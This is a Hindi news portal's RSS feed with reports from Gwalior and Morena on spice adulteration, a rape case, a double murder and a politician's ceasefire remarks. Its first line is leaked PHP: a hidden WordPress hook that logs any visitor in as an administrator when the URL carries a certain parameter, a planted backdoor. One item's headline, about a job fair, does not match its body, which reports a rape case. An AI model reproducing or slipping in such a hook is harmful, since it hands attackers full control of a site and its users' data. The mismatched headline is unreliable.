// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); gwl – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 17 Feb 2026 16:55:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 एमपी में मिलावट का बड़ा खुलासा: मसालों में भूसी और लकड़ी का बुरादा, लोगों की सेहत पर खतरा https://pratyushaashakinayikiran.com/?p=198756 Tue, 17 Feb 2026 16:55:00 +0000 https://pratyushaashakinayikiran.com/?p=198756 ग्वालियर
आज के दौर में  खाद्य पदार्थों में जो मिलावटी जहर मिलाकर बेचा जा रहा है वो किसी से छिपा नहीं है।  मिटावटी चीजें खाने से ही लोगों का स्वास्थ्य खराब हो रहा है और कई तरह की बीमारियां भी लग रही हैं। मिलावट का ये धंधे थमने का नाम नहीं ले रहा है। मध्य प्रदेश के ग्वालियर में जो खाद्य विभाग ने कार्रवाई की है वो रौंगटे खड़े करने वाली है। साबुत हल्दी, साबुत लाल मिर्च, साबुत धनिया में भूसी (चौकर) और लकड़ी का बुरादा मिलाकर लोगो की सेहत के साथ मजाक किया जा रहा है। हॉस्पिटल रोड पर स्थित एक मसाला पिसाई चक्की पर टीम ने कार्रवाई की है

मध्य प्रदेश के ग्वालियर जिले मे खाद्य विभाग ने मिलावट के संदेह पर बड़ी कार्रवाई की है। मसाला पिसाई केंद्र पर जांच के दौरान लकड़ी का बुरादा मिलने से हड़कंप मच गया। खाद्य विभाग की टीम ने गरम मसाले और अन्य मसालों के नमूने जांच के लिए भेजे हैं और मौके से करीब 30 हजार 700 रुपये कीमत का मसाला जब्त किया गया है।

लोगो के स्वास्थ्य से किया जा रहा खिलवाड़
आम जनता को शुद्ध खाद्य सामग्री उपलब्ध कराने के उद्देश्य से कलेक्टर रुचिका चौहान के निर्देश पर यह कार्रवाई की गई। जांच में धनिया, हल्दी, लाल मिर्च और गरम मसाले के साथ चौकर और लकड़ी का बुरादा भी पाया गया, जिसे मिलावट के लिए इस्तेमाल किए जाने का संदेह है।

निरीक्षण के दौरान जो सामने आया, उसने टीम भी चौंक गई।  परिसर में ही साबुत हल्दी, साबुत लाल मिर्च, साबुत धनिया और तैयार धनिया पाउडर के साथ गरम मसाला पाउडर और भूसी (चौकर) और लकड़ी का बुरादा भी पाया गया है। जांच में सामने आया कि, भूसी और लकड़ी के बुरादे का इस्तेमा धनिया पाउडर में मिलावट के लिए किया जा रहा था। भूसी और लकड़ी का बुरादा मिलाकर यहां धनिया बेचा जा रहा था।

चक्की को किया गया सील
खाद्य विभाग का कहना है कि जांच रिपोर्ट आने के बाद यदि मिलावट की पुष्टि होती है तो संबंधित पिसाई केंद्र का पंजीयन निरस्त किया जाएगा और नियमानुसार कड़ी कार्रवाई की जाएगी। फिलहाल, जांच में अनियमितताएं सामने आने के बाद टीम ने तत्काल ही मसाला कारोबार बंद करा दिया है। साथ ही, पिसाई केंद्र को सील कर दिया।

 

]]>
बड़ी कंपनियों में नौकरी का सुनहरा मौका, 6 दिन तक चलेगा रोजगार मेला, युवाओं के लिए सीधी भर्ती https://pratyushaashakinayikiran.com/?p=196366 Sun, 08 Feb 2026 12:25:00 +0000 https://pratyushaashakinayikiran.com/?p=196366 ग्वालियर
मध्य प्रदेश के ग्वालियर जिले से मानवता को झकझोर देने वाला सनसनीखेज मामला सामने आया है। बिजौली थाना क्षेत्र में दो सगी बहनों के साथ दुष्कर्म की वारदात को अंजाम दिया गया। पीड़िताओं में एक शादीशुदा महिला है, जबकि दूसरी उसकी नाबालिग बहन बताई जा रही है।

आरोप है कि महिला के मौसेरे भाई धर्मेंद्र और उसके दोस्त अमन खान ने इस जघन्य अपराध को अंजाम दिया। जानकारी के अनुसार महिला का पति अहमदाबाद में काम करता है। इसी का फायदा उठाकर दोनों आरोपी देर रात बहाने से पीड़ित बहनों के घर रुक गए। आरोपियों ने शादी का झांसा देकर दोनों बहनों के साथ दुष्कर्म किया और इसके बाद घर में रखे 40 हजार रुपये नगद तथा चांदी की पायल लूटकर फरार हो गए। घटना के बाद पीड़िता ने बिजौली थाना पहुंचकर शिकायत दर्ज कराई।

पुलिस ने मामले को गंभीरता से लेते हुए दोनों आरोपियों के खिलाफ दुष्कर्म (IPC 376) सहित अन्य धाराओं में केस दर्ज कर लिया है। फिलहाल पुलिस आरोपियों की तलाश में जुटी हुई है और मामले की गहन जांच जारी है।

]]>
चाचा-भतीजे हत्याकांड मामले से पर्दा उठ चुका, शराब नहीं डीजल कारोबारियों ने की चाचा-भतीजे की हत्या https://pratyushaashakinayikiran.com/?p=159733 Wed, 28 May 2025 15:33:00 +0000 https://pratyushaashakinayikiran.com/?p=159733 मुरैना 
चाचा-भतीजे हत्याकांड मामले से पर्दा उठ चुका है। मुरैना जिले के सिहौनियां क्षेत्र में बीते सोमवार 26 मई को कुछ अवैध कारोबारियों ने चाचा-भतीजा की गोली मारकर हत्या कर दी थी। पहले कहा जा रहा था कि इस घटना के पीछे अवैध शराब कारोबारियों का हाथ है लेकिन पुलिस ने जब जांच की तो आरोपी कोई और ही निकले।
 
गिरफ्तार आरोपियों के पास से हथियार व कार भी बरामद
जिले के पुलिस अधीक्षक समीर सौरभ ने बताया कि इस घटना को अंजाम अवैध शराब कारोबारी ने नहीं बल्कि अवैध डीजल के कारोबारियों ने दी थी। पुलिस अधीक्षक समीर सौरभ ने हत्याकांड का राजफाश करते हुए यह जानकारी दी कि इस मामले में दो लोगों को गिरफ्तार कर लिया गया है। साथ ही घटना के दिन इस्तेमाल किए गए हथियार व कार की बरामदगी भी कर ली गई है।

सीसीटीवी फुटेज से पुलिस को कार का मिला सुराग
इस मामले की गुत्थी तब सुलझी जब पुलिस को सीसीटीवी फुटेज से कार का सुराग मिला। कार को पुलिस ने पोरसा की आइस फैक्ट्री से बरामद किया। इसके संचालक वीरपाल शुक्ला उर्फ वीरू और उसके साथी गोविंदा उर्फ पन्नू खटीक को पकड़ा गया। पुछताछ के बाद पता चला कि वीरू कार में अवैध डीजल ले जा रहा था। दोनों लोग टैंकरों से चोरी का डीजल खरीद कर गांवों में बेचने का काम करते थे।

कार रोका तो सामने से की थी फायरिंग
बता दें कि सिहोनिया के भाटापुरा नहर पुलिया के पास सोमवार (26 मई) की सुबह बंटी भदौरिया और उनके भतीजे भोला भदौरिया की गोली मारकर हत्या कर दी गई थी। बंटी और भोला को अवैध शराब की तस्करी की सूचना मिली थी जिसे रोकने के लिए दोनों अपने साथियों के साथ एक कार पकड़ने गए थे। इसी बीच बिना नंबर की कार को जब उन्होंने घेरा तो कार सवारों ने फायरिंग कर दी, जिसमें दोनों की मौत हो गई थी।

]]>
हमें दुख है कि युद्ध विराम की घोषणा होने के बाद पाकिस्तान द्वारा भारत पर मिसाइल दागे गए, जो उचित नहीं: दिग्विजय सिंह https://pratyushaashakinayikiran.com/?p=155454 Sun, 11 May 2025 10:25:00 +0000 https://pratyushaashakinayikiran.com/?p=155454 गुना
मध्य प्रदेश के पूर्व मुख्यमंत्री दिग्विजय सिंह ने कहा कि युद्ध विराम की घोषणा के बाद पाकिस्तान का मिसाइल दागना गलत है। इस पर सख्ती से रोक लगना चाहिए। राज्यसभा सदस्य सिंह रविवार सुबह शहर के हड्डी मिल क्षेत्र में भू-माफिया से पीड़ित आदिवासी परिवार से मिलने पहुंचे थे।

इस दौरान वे मीडिया से अनौपचारिक चर्चा कर रहे थे। दिग्विजय ने कहा कि हर समस्या का निदान बातचीत है, जबकि युद्ध तो आखिरी विकल्प होता है। सिंह ने कहा कि पाकिस्तान आतंकवादियों का गढ़ बन चुका है। वहां की सरकार आतंकवादियों को पैसे का लालच देकर ट्रेनिंग देती है, जिसके बाद उन्हें आतंकवादी गतिविधियों में शामिल करती है।
 
युद्ध विराम की घोषणा के बाद भी मिसाइल दागी
यह सब बातें अब साफ होकर उजागर हो चुकी हैं। उन्होंने कहा कि अधिकांश देश भी स्वीकार कर चुके हैं कि पाकिस्तान पूरी तरह आतंकियों का गढ़ बन चुका है। पूर्व मुख्यमंत्री ने कहा कि हमें दुख है कि युद्ध विराम की घोषणा होने के बाद पाकिस्तान द्वारा भारत पर मिसाइल दागे गए, जो उचित नहीं है।

इस पर सख्ती से रोक लगाई जाना चाहिए। युद्ध के समय विपक्ष के भारत सरकार के साथ खड़े होने के सवाल पर सिंह ने कहा कि जब देश संकट में हो, तो सभी को राजनीति से परे होना चाहिए। हम भारत सरकार और सेना के साथ खड़े हैं और जरूरत में पूरा समर्थन करेंगे।

]]>